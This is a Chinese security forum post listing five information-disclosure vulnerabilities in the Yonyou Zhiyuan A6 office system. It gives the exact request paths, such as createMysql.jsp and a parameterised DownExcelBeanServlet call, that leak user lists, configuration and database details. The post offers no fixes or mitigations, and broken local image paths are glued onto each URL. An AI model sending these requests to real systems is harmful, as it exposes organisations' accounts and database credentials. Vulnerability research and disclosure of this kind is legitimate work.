安全矩阵

 找回密码
 立即注册
搜索
查看: 1538|回复: 0

用友致远A6协同管理系统多处敏感信息泄露

[复制链接]

180

主题

231

帖子

1180

积分

金牌会员

Rank: 6Rank: 6

积分
1180
发表于 2022-12-16 20:03:03 | 显示全部楼层 |阅读模式

1、initDataAssess.jsp 用户敏感信息泄露漏洞
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/assess/js/initDataAssess.jsp

2、reloadData.jsp 用户敏感信息泄露漏洞
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/common/SelectPerson/reloadData.jsp
这里需要查看网页源码才能看到信息

3、config.jsp 敏感信息泄漏漏洞
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/ext/trafaxserver/SystemManage/config.jsp

4、createMysql.jsp 数据库敏感信息泄露漏洞
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/createMysql.jsp
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/ext/createMysql.jsp

5、DownExcelBeanServlet 用户敏感信息泄露
file:///C:\Users\SuperZJY\AppData\Roaming\Tencent\QQ\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttp://xx.xx.xx.xx/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:49 , Processed in 0.015125 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表